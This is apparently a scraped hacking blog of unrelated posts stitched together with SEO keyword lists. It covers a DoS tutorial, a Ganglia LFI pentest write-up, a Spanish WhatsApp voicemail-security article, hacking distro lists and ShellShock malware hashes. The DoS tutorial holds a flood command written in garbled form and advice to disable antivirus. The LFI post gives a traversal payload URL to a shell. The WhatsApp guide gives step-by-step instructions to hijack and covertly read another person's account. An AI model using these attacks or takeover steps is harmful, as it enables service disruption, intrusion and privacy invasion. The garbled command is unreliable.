Friday, May 22, 2020

DOS (Denial Of Service) Attack Tutorial Ping Of Death ;DDOS

What is DoS Attack?

DOS is an attack used to deny legitimate users access to a resource such as accessing a website, network, emails, etc. or making it extremely slow. DoS is the acronym for Denial oService. This type of attack is usually implemented by hitting the target resource such as a web server with too many requests at the same time. This results in the server failing to respond to all the requests. The effect of this can either be crashing the servers or slowing them down.


Cutting off some business from the internet can lead to significant loss of business or money. The internet and computer networks power a lot of businesses. Some organizations such as payment gateways, e-commerce sites entirely depend on the internet to do business.

In this tutorial, we will introduce you to what denial of service attack is, how it is performed and how you can protect against such attacks.

Topics covered in this tutorial

Types of Dos Attacks

There are two types of Dos attacks namely;

  • DoS– this type of attack is performed by a single host
  • Distributed DoS– this type of attack is performed by a number of compromised machines that all target the same victim. It floods the network with data packets.

Ultimate guide to DoS(Denial of Service) Attacks

How DoS attacks work

Let's look at how DoS attacks are performed and the techniques used. We will look at five common types of attacks.

Ping of Death

The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The ping of death takes advantage of this and sends data packets above the maximum limit (65,536 bytes) that TCP/IP allows. TCP/IP fragmentation breaks the packets into small chunks that are sent to the server. Since the sent data packages are larger than what the server can handle, the server can freeze, reboot, or crash.

Smurf

This type of attack uses large amounts of Internet Control Message Protocol (ICMP) ping traffic target at an Internet Broadcast Address. The reply IP address is spoofed to that of the intended victim. All the replies are sent to the victim instead of the IP used for the pings. Since a single Internet Broadcast Address can support a maximum of 255 hosts, a smurf attack amplifies a single ping 255 times.  The effect of this is slowing down the network to a point where it is impossible to use it.

Buffer overflow

A buffer is a temporal storage location in RAM that is used to hold data so that the CPU can manipulate it before writing it back to the disc. Buffers have a size limit. This type of attack loads the buffer with more data that it can hold. This causes the buffer to overflow and corrupt the data it holds. An example of a buffer overflow is sending emails with file names that have 256 characters.

Teardrop

This type of attack uses larger data packets. TCP/IP breaks them into fragments that are assembled on the receiving host. The attacker manipulates the packets as they are sent so that they overlap each other. This can cause the intended victim to crash as it tries to re-assemble the packets.

SYN attack

SYN is a short form for Synchronize. This type of attack takes advantage of the three-way handshake to establish communication using TCP. SYN attack works by flooding the victim with incomplete SYN messages. This causes the victim machine to allocate memory resources that are never used and deny access to legitimate users.

DoS attack tools

The following are some of the tools that can be used to perform DoS attacks.

  • Nemesy– this tool can be used to generate random packets. It works on windows. This tool can be downloaded from http://packetstormsecurity.com/files/25599/nemesy13.zip.html . Due to the nature of the program, if you have an antivirus, it will most likely be detected as a virus.
  • Land and LaTierra– this tool can be used for IP spoofing and opening TCP connections
  • Blast– this tool can be downloaded from http://www.opencomm.co.uk/products/blast/features.php
  • Panther- this tool can be used to flood a victim's network with UDP packets.
  • Botnets– these are multitudes of compromised computers on the Internet that can be used to perform a distributed denial of service attack.

DoS Protection: Prevent an attack

An organization can adopt the following policy to protect itself against Denial of Service attacks.

  • Attacks such as SYN flooding take advantage of bugs in the operating system. Installing security patches can help reduce the chances of such attacks.
  • Intrusion detection systems can also be used to identify and even stop illegal activities
  • Firewalls can be used to stop simple DoS attacks by blocking all traffic coming from an attacker by identifying his IP.
  • Routers can be configured via the Access Control List to limit access to the network and drop suspected illegal traffic.

Hacking Activity: Ping of Death

We will assume you are using Windows for this exercise. We will also assume that you have at least two computers that are on the same network. DOS attacks are illegal on networks that you are not authorized to do so. This is why you will need to setup your own network for this exercise.

Open the command prompt on the target computer

Enter the command ipconfig. You will get results similar to the ones shown below

Ultimate guide to DoS(Denial of Service) Attacks

For this example, we are using Mobile Broadband connection details. Take note of the IP address. Note: for this example to be more effective, and you must use a LAN network.

 Switch to the computer that you want to use for the attack and open the command prompt

We will ping our victim computer with infinite data packets of 65500

Enter the following command

ping 10.128.131.108 –t |65500

HERE,

  • "ping" sends the data packets to the victim
  • "10.128.131.108" is the IP address of the victim
  • "-t" means the data packets should be sent until the program is stopped
  • "-l" specifies the data load to be sent to the victim

You will get results similar to the ones shown below

Ultimate guide to DoS(Denial of Service) Attacks

Flooding the target computer with data packets doesn't have much effect on the victim. In order for the attack to be more effective, you should attack the target computer with pings from more than one computer.

The above attack can be used to attacker routers, web servers etc.

If you want to see the effects of the attack on the target computer, you can open the task manager and view the network activities.

  • Right click on the taskbar
  • Select start task manager
  • Click on the network tab
  • You will get results similar to the following

Ultimate guide to DoS(Denial of Service) Attacks

If the attack is successful, you should be able to see increased network activities.

 

Hacking Activity: Launch a DOS attack

In this practical scenario, we are going to use Nemesy to generate data packets and flood the target computer, router or server.

As stated above, Nemesy will be detected as an illegal program by your anti-virus. You will have to disable the anti-virus for this exercise.

Ultimate guide to DoS(Denial of Service) Attacks

Enter the target IP address, in this example; we have used the target IP we used in the above example.

HERE,

  • 0 as the number of packets means infinity. You can set it to the desired number if you do not want to send, infinity data packets
  • The size field specifies the data bytes to be sent and the delay specifies the time interval in milliseconds.

 

Click on send button

You should be able to see the following results

Ultimate guide to DoS(Denial of Service) Attacks

The title bar will show you the number of packets sent

Click on halt button to stop the program from sending data packets.

You can monitor the task manager of the target computer to see the network activities.

Summary

  • A denial of service attack's intent is to deny legitimate users access to a resource such as a network, server etc.
  • There are two types of attacks, denial of service and distributed denial of service.
  • A denial of service attack can be carried out using SYN Flooding, Ping of Death, Teardrop, Smurf or buffer overflow
  • Security patches for operating systems, router configuration, firewalls and intrusion detection systems can be used to protect against denial of service attacks.
@EVERYTHING NT

Related news


Ganglia Monitoring System LFI


Awhile back when doing a pentest I ran into an interesting web application on a server that was acting as a gateway into a juicy environment *cough*pci*cough*, the application was "Ganglia Monitoring System" http://ganglia.sourceforge.net
The scope of the test was extremely limited and it wasn't looking good....the host that was in scope had a ton of little stuff but nothing that looked like it would give me a solid foothold into the target network. After spending some time looking for obvious ways into the system I figured it would be worth looking at the Ganglia application, especially since I could find no public exploits for the app in the usual places....

First step was to build a lab up on a VM (ubuntu)
apt-get install ganglia-webfrontend

After apt was done doing its thing I went ahead and started poking around in the web front end files (/usr/share/ganglia-webfrontend). I looked to see if the application had any sort of admin functionality that I could abuse or some sort of insecure direct object reference issues. Nothing looked good. I moved on to auditing the php.

Started out with a simple grep looking for php includes that used a variable....bingo.

steponequit@steponequit-desktop:/usr/share/ganglia-webfrontend$ egrep 'include.*\$' *
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $tpl_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $include_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: $include_file = $regs[2];
class.TemplatePower.inc.php: if( !@include_once( $include_file ) )
class.TemplatePower.inc.php: $this->__errorAlert( 'TemplatePower Error: Couldn\'t include script [ '. $include_file .' ]!' );
class.TemplatePower.inc.php: $this->tpl_include["$iblockname"] = Array( $value, $type );
graph.php: include_once($graph_file);
The graph.php line jumped out at me. Looking into the file it was obvious this variable was built from user input :)
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : NULL;
....
....
....
$graph_file = "$graphdir/$graph.php";


Taking at look at the "sanitize" function I can see this shouldn't upset any file include fun

function sanitize ( $string ) {
return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}

#-------------------------------------------------------------------------------
# If arg is a valid number, return it. Otherwise, return null.
function clean_number( $value )
{
return is_numeric( $value ) ? $value : null;
}
Going back to the graph.php file

$graph_file = "$graphdir/$graph.php";

if ( is_readable($graph_file) ) {
include_once($graph_file);

$graph_function = "graph_${graph}";
$graph_function($rrdtool_graph); // Pass by reference call, $rrdtool_graph modified inplace
} else {
/* Bad stuff happened. */
error_log("Tried to load graph file [$graph_file], but failed. Invalid graph, aborting.");
exit();
}

We can see here that our $graph value is inserted into the target string $graph_file with a directory on the front and a php extension on the end. The script then checks to make sure it can read the file that has been specified and finally includes it, looks good to me :).
The start of our string is defined in conf.php as "$graphdir='./graph.d'", this poses no issue as we can traverse back to the root of the file system using "../../../../../../../../". The part that does pose some annoyance is that our target file must end with ".php". So on my lab box I put a php file (phpinfo) in "/tmp" and tried including it...


Win. Not ideal, but it could work....

Going back to the real environment with this it was possible to leverage this seemingly limited vulnerability by putting a file (php shell) on the nfs server that was being used by the target server, this information was gathered from a seemingly low vuln - "public" snmp string. Once the file was placed on nfs it was only a matter of making the include call. All in a hard days work.

I have also briefly looked at the latest version of the Ganglia web front end code and it appears that this vuln still exists (graph.php)

$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
...
...
...
$php_report_file = $conf['graphdir'] . "/" . $graph . ".php";
$json_report_file = $conf['graphdir'] . "/" . $graph . ".json";
if( is_file( $php_report_file ) ) {
include_once $php_report_file;


tl;dr; wrap up - "Ganglia Monitoring System" http://ganglia.sourceforge.net contains a LFI vulnerability in the "graph.php" file. Any local php files can be included by passing its location to the "g" parameter - http://example.com/ganglia/graph.php?g=../../../../../../../tmp/shell
Related word
  1. Wordpress Hacking
  2. Hacking Pages
  3. Hacking Wireless 101 Pdf
  4. El Hacker Pelicula
  5. Blog Seguridad Informática
  6. Etica Definicion
  7. Growth Hacking Ejemplos
  8. Como Ser Hacker
  9. Hacking Ético Con Herramientas Python Pdf
  10. Como Ser Hacker
  11. Growth Hacking Examples
  12. Mind Hacking
  13. Growth Hacking Libro
  14. Aprender A Ser Hacker
  15. Windows Hacking
  16. Tipos De Hacker

Wednesday, May 20, 2020

Cómo Te Pueden Hackear Cuentas De Whatsapp Usando El Buzón De Voz

Algo que sabes, algo que tienes y algo que eres. Estas son las tres categorías de las que se sirven los sistemas para autenticar a un usuario, es decir, el proceso por el cual la identidad que está queriendo acceder puede responder a la pregunta de quién. Gran parte de los servicios de Internet, en sus inicios, solicitaban únicamente en el registro la necesidad de tener asociado un correo electrónico para cambiar la contraseña.

Figura 1: Cómo te pueden hackear cuentas de Whatsapp usando el buzón de voz

Para un atacante que quisiera conseguir el acceso a un servicio de una persona, primero debía conocer cuál era el correo electrónico de su objetivo, y luego centrarse en conseguir acceso al e-mail, robando la contraseña con un ataque de Spear Phishing, consiguiendo un token OAuth que permitiera leer todos los mensajes como se explica en Sappo, o aprovechándose de que la cuenta de e-mail de recuperación de contraseña sea olvidada y caduquePero el primer paso, siempre es el mismo. Conocer la dirección de e-mail que utiliza un objetivo para identificarse en los servicios de Internet cuando en inicio era solo para recibir mensajes.

El correo electrónico como elemento esencial para la autenticación

En muchas ocasiones, haciendo una simple búsqueda en Google usando técnicas de Hacking con Buscadores podríamos dar con el correo electrónico de una persona. Sin embargo, podría ser que esa persona no hubiera publicado nunca, por lo que podemos recurrir a las siguientes técnicas:

- Leak del login: Chema Alonso ya hablaba sobre ello en el artículo Redes sociales de contactos íntimos que filtran cuentas de sus clientes en donde, introduciendo el correo electrónico, el propio servicio te dice si hay una cuenta creada o no con esa dirección de correo. En servicios como Gmail, además de validar que ese correo existe puedes saber hasta la marca del móvil de la persona ya que se le requiere al usuario acceder a la pestaña de "Seguridad" para obtener el código de seguridad y así poder autenticarse.

Figura 2: Artículo "¿Está seguro tu presidente en Twitter?"
de Yaiza Rubio y Felix Brezo publicado en el blog de ElevenPaths

En cambio, en Outlook, si el correo existe directamente te solicita la contraseña. O, por ejemplo, en 2017, mi compañero Félix Brezo y yo identificamos las cuentas de Twitter de todos los Presidentes de Gobierno y vimos que al menos el 85% de ellos exponía un indicio de la cuenta utilizada en esta red social o que un 30% utilizaron una cuenta de Gmail para su registro.

- Combinaciones de nombre de usuario y servicio de correo: cuando nos encontramos en una situación en la que desconocemos cuál es la cuenta utilizada, en OSRFramework disponemos de una herramienta que se llama mailfy que, pasándoles como parámetro de entrada un nombre de usuario o una dirección de e-mail, te valida si hay una cuenta registrada en servicios como Facebook, Gmail y otros.

Figura 3: Manual de Ciberinvestigación en Fuentes Abiertas: OSINT para Analistas
 
Esta es una herramienta que utilizamos mucho en nuestros ejemplos de búsqueda de información de fuentes OSINT para el mundo de la ciberinvestigación. 

Una vez que hemos conseguido saber la dirección de correo electrónico, al final, todo concluye en poder recuperar el acceso perdido. Un sistema ampliamente aceptado por la mayoría de los servicios como método de recuperación de cuentas cuando te has olvidado de la contraseña, pero que a más de una "celebritry" le ha traído algún que otro disgusto.

El número de teléfono como elemento esencial para la autenticación

Viendo que las direcciones de correo electrónico y el uso de las contraseñas no era lo más recomendable, nació la autenticación basada en el número de teléfono. Con este objetivo, se han creado, entre otros, servicios como el de Mobile Connect, en donde se eliminan por completo las contraseñas. El usuario final introduce su número de teléfono y la operadora automáticamente te envía un desafío de cara a comprobar la posesión del número de teléfono y así finalizar la autenticación. Sin embargo, existen otros servicios de internet como WhatsApp y Telegram que basan la creación de sus cuentas en el número de teléfono.

Empecemos por Whatsapp

Imaginemos la situación en la que un atacante quiere hacerse con una cuenta de un usuario de Whatsapp. Después de instalar la app, tendrá que indicar cuál es el número de teléfono de la cuenta que quiere recuperar en ese terminal y, posteriormente, seleccionar uno de los dos métodos de los que dispone la plataforma para hacer llegar al usuario el código de verificación.

Vamos a plantear tres escenarios que pueden darse. En el Escenario 1, nos encontramos en la situación en la que usuario legítimo dispone de su móvil y recibe un SMS debido a que el atacante ha solicitado el código para verificar el número. 

Figura 4: Verificación de registro de WhatsApp por SMS

A pesar de que este escenario es menos probable de que pueda tener éxito, en el pasado, se ha dado la situación en la que a la víctima se le solicitaba el código de verificación en nombre de Whatsapp. Mira que en el mensaje del SMS lo pone bien claro:  "¡No compartas este código con nadie!" Pero hay más métodos.

1.- Ingeniería social: Como hemos dicho, preguntándole a la víctima por medio de un e-mail, otro SMS, una cuenta maliciosa de WhatsApp o llamándole por teléfono directamente. Cuando se trata de engañar a un usuario, cualquier camino es válido.

2.- App maliciosa o vulnerable con permiso para acceder a los SMS: Si el atacante tiene controlada una app maliciosa con permisos para leer los SMS en el terminal podría recuperarlo siempre. Por ello, hay que tener mucho cuidado qué apps nos instalamos - no tengamos un troyano o una Gremlin App - y tener el sistema operativo y las apps actualizadas. Si tu terminal no soporta las últimas versiones del sistema operativo de Android, deberías pensar en cambiarlo.

3,. SIM Duplicada: Si alguien te puede duplicar tus documentos de identidad, con una fotocopia, o consigue convencer a un empleado en una tienda de tu operadora para conseguir un duplicado de tu SIM, podría recibir los SMS al mismo tiempo, por eso hay que tener mucho cuidado con tu información personal y documentos de identidad.

4.- SIM Swapping: En algunos países, los ataques se hacen abusando de las políticas de portabilidad de números, por lo que es importante conocer cómo de protegido está tu número frente a un intento de portabilidad.

5.- Ataques RTL: Se trata de abusar de la seguridad del canal SMS. Para ello, si el atacante está cerca y conoce bien las herramientas y ataques del Hacking de Comunicaciones Móviles, podría capturar el SMS cuando la antena más cercana los reenvíe hacia tu terminal.

6.- Previsualización de SMS: Si tienes la previsualización de mensajes SMS en la pantalla bloqueada de tu terminal, alguien podría acceder a ellos en un descuido. Sería un ataque local, pero igualmente peligroso. Igual que el truco con Siri para robar cuentas de e-mail.

Como veis, la verificación de dueño de WhatsApp por SMS tiene sus "corner cases" y hay que tener ciertas medidas de precaución, para evitar que uno de estos casos nos afecte. Aún así, quedan dos posibilidades más que pueden ser fácilmente aprovechables por un atacante cercano o remoto.

Escenario 2: Llamada de teléfono

En el Escenario 2, se envía el código de verificación por SMS y, si al cabo de un minuto, no se ha introducido, la víctima podría recibir una llamada a su número de teléfono donde se le indica cuál es su código de verificación. 

Figura 5: Verificación por llamada al número de teléfono

En estos entornos, si el atacante dispusiera del teléfono de la víctima, directamente podría coger la llamada, escuchar el código de verificación y hacerse con la cuenta ya que para descolgar una llamada de teléfono no hay que desbloquear el terminal.

El buzón de voz

Pero imaginemos que la víctima no coge la llamada. Entonces se da el Escenario 3. Automáticamente, WhatsApp te deja un mensaje en el buzón de voz. Y entonces te lo pueden robar del buzón de voz. Para acceder al buzón de voz, suelen existir dos maneras:

1.- Desde tu teléfono: Haciendo la llamada desde el número de teléfono para el que vas a acceder al buzón de voz, por lo que no necesitas dar la contraseña.

Figura 6: WhatsApp deja el código de verificación en el buzon

2) Desde otro teléfono: haciendo una llamada a un número de teléfono si la llamada que se está realizando no es desde el número de teléfono del buzón de voz. En esta situación, te solicitará el PIN en donde dispones de tres intentos. Si esos tres intentos son erróneos se cuelga la llamada. En esta situación, el atacante podría recurrir a estadísticas sobre la frecuencia de uso de los número PIN, en donde el 1234 es el más frecuente, seguido del 1111 y del 0000.

Telegram: El SMS, la llamada y el buzón de Voz

La popular competencia de WhatsApp, el popular Telegram dispone de un sistema parecido. Ofrece a los usuarios los mismos dos métodos: envío del código de verificación mediante SMS y, al cabo de dos minutos, llama al número de teléfono cuya cuenta se quiere recuperar para decirle cuál es el código de verificación, con la salvedad de que no deja el código en el buzón de voz. Esto hace que el problema del ataque al buzón de voz de WhatsApp no le afecte.

Figura 7: Telegram también dispone de código y
llamada telefónica como métodos de validación.

Si bien es cierto que cualquier servicio en Internet debe crear procesos sencillos de cara a captar más usuarios y entendibles a nivel de seguridad para el usuario, esta última opción que ofrece WhatsApp de dejar el código de verificación en el buzón de voz no es ni sencilla, ya que es probable que nadie conozca cuál es su PIN para acceder al buzón de voz y, ni es segura, ya que un atacante con un poco de maña podría sin tener acceso físico al teléfono acceder a la información antes de que el usuario se dé cuenta. 

Recomendaciones de seguridad

Como punto final, os recomiendo el artículo de  Cómo espiar WhatsApp que, aunque tiene ya bastante tiempo, muchos de los ataques sigue funcionando de una forma similar. Respecto a tener protegido tu cuenta de WhatsApp, te dejo esta serie de Proteger tu cuenta de WhatsApp a prueba de balas.

Y para el caso concreto del buzón de voz, asegúrate de que nadie remotamente pueda acceder, ya sea porque tienes desactivado el buzón de voz o porque has cambiado el PIN por defecto. Asegúrate de eso. Por otra parte, tal vez WhatsApp deba replantearse dejar el PIN en un buzón de voz, ya que abre un vector de ataque que tal vez el usuario no sea consciente.

Saludos,


Contactar con Yaiza Rubio

Related posts


  1. Cosas De Hackers
  2. Hacking Con Buscadores Pdf
  3. Sean Ellis Growth Hacking
  4. Hacking Team
  5. Hacking Curso

Top 15 Best Operating System Professional Hackers Use

Top 10 Best Operating System Professional Hackers Use

Top 15 Best Operating System Professional Hackers Use

Top 15 Best Operating System Professional Hackers Use

A hacker is someone who seeks and exploits the weaknesses of a computer system or network computing. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment or to assess these weaknesses to help in removing them.
The listed operating systems are based on the Linux kernel so it is all free operating systems.

1. Kali Linux

Kali Linux maintained and funded by Offensive Security Ltd. and it is first on our list. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through rewriting BackTrack, its previous forensics Linux distribution based on Ubuntu. Kali Linux has a specific project for the withdrawal of compatibility and portability of Android-specific devices, called Kali Linux NetHunter. It is the first open test platform penetration Source for Nexus Android devices, created as a joint effort between the member of the Kali "BinkyBear" Security and offensive community. It supports Wireless 802.11 frame injection, one-click configurations MANA Evil access point, keyboard HID (Teensy as attacks), as well as attacks MITM USB Mala.

2. Back Box

Back Box is an evaluation penetration testing Linux distribution and Ubuntu-based security aimed at providing an analysis of computer network systems and toolkit. Desktop environment back box includes a complete set of tools needed for ethical hacking and security testing.

3. Parrot Security OS

Parrot Security OS is a GNU / Linux distribution based on Debian. Fue built in order to perform penetration tests (safety information), vulnerability assessment and mitigation, Computer Forensics and Anonymous Surfing. Ha been developed by the team of Frozen box.
Parrot is based on the stable branch (Jessie) of Debian, a Linux 4.1 kernel hardened customized with a branch grsecurity patched available. The desktop environment is MATE fork of Gnome 2, and the default display manager is LightDM. The project is certified to run on machines with 265MB of RAM minimum follow and it is suitable for both 32-bit (i386) and 64-bit (amd64), with a special edition that works on 32-bit machines of age (486). Moreover, the project is available for Armel and armhf architectures. It even offers an edition (both 32 bit and 64 bit) developed for servers only for pen testing cloud.

4. Live Hacking OS

Live Hacking OS is a Linux distribution packed with tools and utilities for ethical hacking, penetration testing, and countermeasure verification. It includes embedded GUI GNOME user. There is a second variation available which has only the command line and requires much fewer hardware requirements.

5. DEFT Linux

DEFT stands for Digital Evidence and Forensic Toolkit and it is a distribution of Linux open source software built around the DART (Toolkit for Advanced Response Digital) and is based on the Ubuntu operating system. It has been designed from scratch to offer some of the best computer forensics open source and incident response tools that can be used by individuals, IT auditors, investigators, military, and police.

6. Samurai Web Testing Framework

The Samurai Web Testing Framework is a live Linux environment which has been pre-configured to function as a web pen-testing environment. The CD contains the best of open source and free tools that focus on testing and websites that attack. In the development of this environment, it is based on our selection of tools that we use in our practice of security. Hence, it includes the tools that were used in the four steps of a pen-test web.

7. Network Security Toolkit

The Network Security Toolkit (NST) is a Live CD based on Linux that provides a set of security tools computing and open source network to carry out routine security tasks and diagnostic networks and tracing. The distribution can be used as an analysis of network security, validation and monitoring tool for servers hosting virtual machines. NST has management capabilities similar to Fedora packages and maintains its own repository of additional packages.

8. Bugtraq

Bugtraq is a mailing list dedicated to safety issues in computers. On-topic issues new discussions about vulnerabilities, security-related notices providers, operating methods, and how to fix them. This is a mailing list of large volume, and almost all new vulnerabilities are there. Bugtraq computer freaks and experienced developers are discussed, is available in Debian, Ubuntu and openSUSE 32 and 64-bit architectures.

9. NodeZero

NodeZero is an open source system based on the operating core derived from the most popular Linux distribution in the world, Ubuntu, and designed to be used for penetration testing operations. The distribution can be downloaded as an ISO image live DVD, which will also take place on computers that support both 32-bit (x86) and 64-bit (x86_64) instruction set. Besides the fact that it allows you to start the live system, start menu contains several advanced features such as the ability to perform a diagnostic test of system memory, boot from local disk options, start the installer directly and to start in safe graphics mode, text mode or in debug mode.
Default graphical desktop environment NodeZero is powered by GNOME, which uses the classic GNOME interface. It has a design of two panels and uses the default software repositories of Ubuntu.

10. Pentoo

Pentoo is a Live CD and Live USB OS designed for penetration testing and security assessment. It is based on Gentoo Linux, Pentoo is offered both as 32-bit and 64-bit live cd which is installable. Pentoo is also available as a superposition of an existing Gentoo installation. It has conductors packet injection patched wifi, GPGPU cracking software, and plenty of tools for penetration testing and security assessment. The kernel includes Pentoo grsecurity and PAX hardening and additional patches with the binary compiled from a string of hardened with the latest nightly versions of some tools that are available.

#11 Live Hacking OS

Well, this Linux distro actually comes with some useful hacking tools which are often used in penetration testing or ethical hacking purpose. Live Hacking OS consists of the GNOME inbuilt. The operating system is really easy to operate and it can work on less RAM.

#12 Knoppix STD

This is another best Linux distro which focuses on tools for computer security. Knoppix STD brings some advanced tools for Password cracking, Firewalls, Network Utilities, Honeypots, Wireless Networking and more. This is one of the most used operating systems for Hackers.

#13 Cyborg Hawk

Cyborg Hawk is a new operating system which is based on Ubuntu Linux. Well, lots of hackers talk about Cyborg hawk and its one of the most powerful and cutting-edge penetration testing distribution that has ever been created. The operating system houses more than 700 tools for different purposes.

#14 Blackbuntu

Well, this is another operating system which is based on Linux and it was specially developed for penetration testing. Well, the operating system is very famous amongst hackers and it offers an awesome platform to learn Information security.

#15 Weakerth4n

Well, this is another best operating system which is used by professional hackers. WeakerTh4n actually comes with lots of hacking tools and it's actually a modern operating system for WiFi Hacking. Some of the wireless tools include SQL Hacking, Password Cracking, WiFi attacks, Cisco exploitation and more.

Related links


How To Hack Any Whatsapp Account In 2020

The article will also be broken down into different subtopics and subcategories. This to make it easy for those who are just interested in skimming through the article to pick the part of WhatsApp hack they are most interested in. Just incase you don't have enough time to go through the entire article.

Search queries like these are a common place; Can WhatsApp be hacked? Can you read WhatsApp messages? How safe is the most popular trade fair in the world? This article gives you all the solution you need to hack any WhatsApp account, as well as how to protect yourself from a WhatsApp hack attack.

Although the messenger is now on an end-to-end encryption, WhatsApp is still not totally safe from espionage. WhatsApp chats and messages can still be accessed and read remotely, and old &deleted WhatsApp chats and messages retrieved.

WhatsApp Spy: Hack WhatsApp Chats and Messages

A very simple solution is to use a software that can hack WhatsApp remotely. All manufacturers offer to read the WhatsApp messages an extra web portal. In addition to the Whatsapp messages but can also spy on other messengers. So you can also have access to social media accounts.

The software may only be installed on a smartphone. If the user of the smartphone has been informed about the installation and effects.

WhatsApp Hacker: 3 Steps to Hack WhatsApp in 2020

You can hack Whatsapp using a second cell phone. No extra SIM card is necessary for this. The guide also works with a tablet. With this method, the other phone only needs to clone WhatsApp messages is internet connection.

The trick to hack Whatsapp successfully is not a software bug. It's the way WhatsApp has developed the setup wizard. Since there are no user accounts with passwords and you log in via the mobile number, here lies the vulnerability. But you can also protect yourself from the Whatsapp hack.

Hack WhatsApp Chat with the Best WhatsApp Hacking Tool

To read Whatsapp messages, the mobile phone number of the target must be known. The cell phone can remain locked. There is no need to install software to hack and read Whatsapp messages. Even with the PIN or fingerprint, the Whatsapp account can be hacked.

STEP 1: Create a New WhatsApp Account

To hack an account from Whatsapp, the app from the App Store must be installed on the second cell phone. After the installation of Whatsapp, target's phone number is entered. A confirmation request must be waited until access to the smartphone of the victim exists.

STEP 2: WhatsApp Account Confirmation

The confirmation of the Whatsapp account is the actual security risk of the messenger. Whatsapp usually confirms the registration via SMS. Occasionally the confirmation will also be sent by automated phone call via a phone call.

Calls and text messages can be read and taken by anyone even when the screen is locked. So that the WhatsApp hack does not stand out, the SMS must be removed from the start screen by swiping.

STEP 3: Enter Confirmation

The stolen verification PIN is now entered on the second smartphone. As a result, the WhatsApp account has been taken over by you. You can read the WhatsApp messages, which respond to this mobile phone number.

The downside to this trick is that the victim immediately notices the Whatsapp hack as soon as Whatsapp is opened. If the victim goes through the sign-in process again. The attacker loses access to the messages and no Whatsapp messages can be read.

How to Hack Someone's WhatsApp in 2020

A good way to hack a WhatsApp account is to hack whatsapp online. Here you can read WhatsApp messages via a browser and also write. The target user can continue to use his cell phone (works for iOS, Android phone etc) and does not notice the WhatsApp hack.

STEP 1: Access the Cell Phone

In order to be able to read WhatsApp messages by installing software. Access to the unlocked smartphone is required for a short time. In addition, cell phone, a computer or laptop is necessary. On this the Whatsapp messages will be read later.

STEP 2: Access WhatsApp Web

If you have access to the unlocked smartphone, Whatsapp must be started there. The Whatsapp settings include Whatsapp Web . If this is selected, Whatsapp opens a QR code scanner with the hint to open WhatsApp Web in the browser.

If the QR code is scanned in the browser with the smartphone. There is a permanent connection and Whatsapp messages can be read. If you want to hack Whatsapp in this way. You have full access to all incoming messages and you can even write messages yourself.

STEP 3: Read WhatsApp Messages

The target usually sees this Whatsapp hack only when the settings are invoked to Whatsapp Web in the app. Whatsapp messages can be read via the browser. Regardless of whether the smartphone is on home Wi-Fi or on the move. You can also hack group chats admin by just having any of the contact details.

WhatsApp Hack: How to Hack any WhatsApp account

Which is the most popular messaging app globally? Of course, you can use different apps from Android or iOS to send and receive messages. But Whatsapp remains everyone's favorite globally!

Whatsapp is one of the popular apps in the world. There are more than 2 billion active users on Whatsapp, messaging daily with the app. Why do people love WhatsApp? Whatsapp is very convenient and easy to use.

Other messaging apps like Facebook Messenger, still needs a special account to sign up for this app. If you change a new app, you'll need to add another account. This can be stressful, as you have to remember a lot of new passwords and usernames.

HACKER NT

Related links


Tuesday, May 19, 2020

ShellShock Payload Sample Linux.Bashlet



Someone kindly shared their sample of the shellshock malware described by the Malware Must die group - you can read their analysis here:

File: fu4k_2485040231A35B7A465361FAF92A512D
Size: 152
MD5: 2485040231A35B7A465361FAF92A512


VIrustotal

SHA256: e74b2ed6b8b005d6c2eea4c761a2565cde9aab81d5005ed86f45ebf5089add81
File name: trzA114.tmp
Detection ratio: 22 / 55
Analysis date: 2014-10-02 05:12:29 UTC ( 6 hours, 50 minutes ago )
Antivirus Result Update
Ad-Aware Linux.Backdoor.H 20141002
Avast ELF:Shellshock-A [Expl] 20141002
Avira Linux/Small.152.A 20141002
BitDefender Linux.Backdoor.H 20141002
DrWeb Linux.BackDoor.Shellshock.2 20141002
ESET-NOD32 Linux/Agent.AB 20141002
Emsisoft Linux.Backdoor.H (B) 20141002
F-Secure Linux.Backdoor.H 20141001
Fortinet Linux/Small.CU!tr 20141002
GData Linux.Backdoor.H 20141002
Ikarus Backdoor.Linux.Small 20141002
K7AntiVirus Trojan ( 0001140e1 ) 20141001
K7GW Trojan ( 0001140e1 ) 20141001
Kaspersky Backdoor.Linux.Small.cu 20141001
MicroWorld-eScan Linux.Backdoor.H 20141002
Qihoo-360 Trojan.Generic 20141002
Sophos Linux/Bdoor-BGG 20141002
Symantec Linux.Bashlet 20141002
Tencent Win32.Trojan.Gen.Vdat 20141002
TrendMicro ELF_BASHLET.A 20141002
TrendMicro-HouseCall ELF_BASHLET.A 20141002
nProtect Linux.Backdoor.H 20141001

More articles


  1. Web Hacking 101
  2. Hacking Videos
  3. Hacking Time
  4. Hacking To The Gate
  5. Kali Hacking
  6. Hacking Etico Curso Gratis
  7. Google Hacking
  8. Curso De Hacker Gratis Desde Cero
  9. Ethical Hacking Course
  10. Aprender Hacking
  11. Wifi Hacking App
  12. Significado Hacker
  13. Hacker Etico